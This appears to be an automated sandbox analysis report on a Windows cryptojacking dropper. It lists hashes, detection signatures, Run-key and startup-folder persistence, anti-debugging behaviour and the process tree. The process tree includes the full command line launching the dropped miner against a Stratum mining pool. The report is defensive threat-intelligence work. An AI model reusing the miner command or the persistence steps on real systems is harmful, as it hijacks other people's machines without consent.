Analysis
-
max time kernel
191s -
max time network
197s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
08/05/2022, 15:53
Static task
static1
Behavioral task
behavioral1
Sample
c93ffa5d3a9914e0dc9c50212983197285e0123108d42a747d82b52384c70a19.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
c93ffa5d3a9914e0dc9c50212983197285e0123108d42a747d82b52384c70a19.exe
Resource
win10v2004-20220414-en
General
-
Target
c93ffa5d3a9914e0dc9c50212983197285e0123108d42a747d82b52384c70a19.exe
-
Size
4.5MB
-
MD5
5aef5a0d347b8c5d6b5d452cb854b250
-
SHA1
e34bce7e0274a114fe8d047899d4cc8a76e7d309
-
SHA256
c93ffa5d3a9914e0dc9c50212983197285e0123108d42a747d82b52384c70a19
-
SHA512
88cc999f99c4265209e4a250ef24d8d8c786acd65282b952dbe989e9c76d0ff4feadf62220e58f1656ded97590672d16eeb7fbfb824f22015805385fbcc6a725
Malware Config
Signatures
-
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
LoaderBot executable 1 IoCs
resource yara_rule behavioral2/memory/3752-139-0x0000000000170000-0x0000000000986000-memory.dmp loaderbot -
Executes dropped EXE 4 IoCs
pid Process 3612 TMACv6.0.7_Setup.exe 3752 Miner Asazello Soft.exe 4544 Driver.exe 3572 Driver.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation Miner Asazello Soft.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation c93ffa5d3a9914e0dc9c50212983197285e0123108d42a747d82b52384c70a19.exe -
Cryptocurrency Miner
Makes network request to known mining pool URL.
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url Miner Asazello Soft.exe -
Loads dropped DLL 1 IoCs
pid Process 1388 c93ffa5d3a9914e0dc9c50212983197285e0123108d42a747d82b52384c70a19.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\Miner Asazello Soft.exe" Miner Asazello Soft.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 3128 4544 WerFault.exe 85 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe 3752 Miner Asazello Soft.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3752 Miner Asazello Soft.exe Token: SeLockMemoryPrivilege 4544 Driver.exe Token: SeLockMemoryPrivilege 4544 Driver.exe Token: SeLockMemoryPrivilege 3572 Driver.exe Token: SeLockMemoryPrivilege 3572 Driver.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 3752 Miner Asazello Soft.exe 3612 TMACv6.0.7_Setup.exe 3612 TMACv6.0.7_Setup.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1388 wrote to memory of 3612 1388 c93ffa5d3a9914e0dc9c50212983197285e0123108d42a747d82b52384c70a19.exe 82 PID 1388 wrote to memory of 3612 1388 c93ffa5d3a9914e0dc9c50212983197285e0123108d42a747d82b52384c70a19.exe 82 PID 1388 wrote to memory of 3612 1388 c93ffa5d3a9914e0dc9c50212983197285e0123108d42a747d82b52384c70a19.exe 82 PID 1388 wrote to memory of 3752 1388 c93ffa5d3a9914e0dc9c50212983197285e0123108d42a747d82b52384c70a19.exe 83 PID 1388 wrote to memory of 3752 1388 c93ffa5d3a9914e0dc9c50212983197285e0123108d42a747d82b52384c70a19.exe 83 PID 1388 wrote to memory of 3752 1388 c93ffa5d3a9914e0dc9c50212983197285e0123108d42a747d82b52384c70a19.exe 83 PID 3752 wrote to memory of 4544 3752 Miner Asazello Soft.exe 85 PID 3752 wrote to memory of 4544 3752 Miner Asazello Soft.exe 85 PID 3752 wrote to memory of 3572 3752 Miner Asazello Soft.exe 89 PID 3752 wrote to memory of 3572 3752 Miner Asazello Soft.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\c93ffa5d3a9914e0dc9c50212983197285e0123108d42a747d82b52384c70a19.exe"C:\Users\Admin\AppData\Local\Temp\c93ffa5d3a9914e0dc9c50212983197285e0123108d42a747d82b52384c70a19.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Users\Admin\AppData\Roaming\1337\TMACv6.0.7_Setup.exe"C:\Users\Admin\AppData\Roaming\1337\TMACv6.0.7_Setup.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3612
-
-
C:\Users\Admin\AppData\Roaming\1337\Miner Asazello Soft.exe"C:\Users\Admin\AppData\Roaming\1337\Miner Asazello Soft.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4544 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4544 -s 7604⤵
- Program crash
PID:3128
-
-
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -k -v=0 --donate-level=1 -t 13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 460 -p 4544 -ip 45441⤵PID:4660
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
3.1MB
MD57567e0843e8dba94e2cef2c8950d2142
SHA1a15622d460ea78774c64fc4861855b1a4f15d856
SHA2560a00cd6b0b16daeb30e89fad8af9ca56deaebe174e2ae49c71950ca1b05af26c
SHA5120fd88b2dfbcad30010a1d4123e29a91d6c8f5c2d32a9a9657320dfb589a60dac0175c62328db67d46418e6f895e6d5a8c3e85da61d4bf2e78c58281607a2297e
-
Filesize
3.1MB
MD57567e0843e8dba94e2cef2c8950d2142
SHA1a15622d460ea78774c64fc4861855b1a4f15d856
SHA2560a00cd6b0b16daeb30e89fad8af9ca56deaebe174e2ae49c71950ca1b05af26c
SHA5120fd88b2dfbcad30010a1d4123e29a91d6c8f5c2d32a9a9657320dfb589a60dac0175c62328db67d46418e6f895e6d5a8c3e85da61d4bf2e78c58281607a2297e
-
Filesize
5.1MB
MD5a7c8cf1d50ebe630a7d0c47686a0abbf
SHA13229e8080975f4f5512d2382552f68c0389acff5
SHA256a453b3ea8d8133531fad26b18701c694c324cc201e3069d07e99f0e100908c1a
SHA51242340b7435605049e3f817feac1ac238177772b2b1ebf05eb9311bb58ee3dd1cab39913240a4c39e3407374009310770d8221c31914549524ecd92beab93b787
-
Filesize
5.1MB
MD5a7c8cf1d50ebe630a7d0c47686a0abbf
SHA13229e8080975f4f5512d2382552f68c0389acff5
SHA256a453b3ea8d8133531fad26b18701c694c324cc201e3069d07e99f0e100908c1a
SHA51242340b7435605049e3f817feac1ac238177772b2b1ebf05eb9311bb58ee3dd1cab39913240a4c39e3407374009310770d8221c31914549524ecd92beab93b787
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322
-
Filesize
3.9MB
MD502569a7a91a71133d4a1023bf32aa6f4
SHA10f16bcb3f3f085d3d3be912195558e9f9680d574
SHA2568d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0
SHA512534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322